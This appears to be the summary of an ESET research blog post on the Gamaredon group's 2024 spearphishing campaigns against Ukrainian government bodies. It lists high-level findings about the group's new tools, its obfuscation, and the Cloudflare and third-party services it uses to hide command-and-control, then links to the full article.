Gamaredon in 2024 Cranking out spearphishing campaigns against Ukraine with an evolved toolset

Key points of this blogpost:

• Gamaredon refocused exclusively on targeting Ukrainian governmental institutions in 2024, abandoning prior attempts against NATO countries.
• The group significantly increased the scale and frequency of spearphishing campaigns, employing new delivery methods such as malicious hyperlinks and LNK files executing PowerShell from Cloudflare-hosted domains.
• Gamaredon introduced six new malware tools, leveraging PowerShell and VBScript, designed primarily for stealth, persistence, and lateral movement.
• Existing tools received major upgrades, including enhanced obfuscation, improved stealth tactics, and sophisticated methods for lateral movement and data exfiltration.
• Gamaredon operators managed to hide almost their entire C&C infrastructure behind Cloudflare tunnels.
• Gamaredon increasingly relied on third-party services (Telegram, Telegraph, Cloudflare, Dropbox) and DNS-over-HTTPS (DoH) for protecting its C&C infrastructure.

To read the complete article see: https://www.welivesecurity.com/en/eset-research/gamaredon-2024-cranking-out-spearphishing-campaigns-ukraine-evolved-toolset/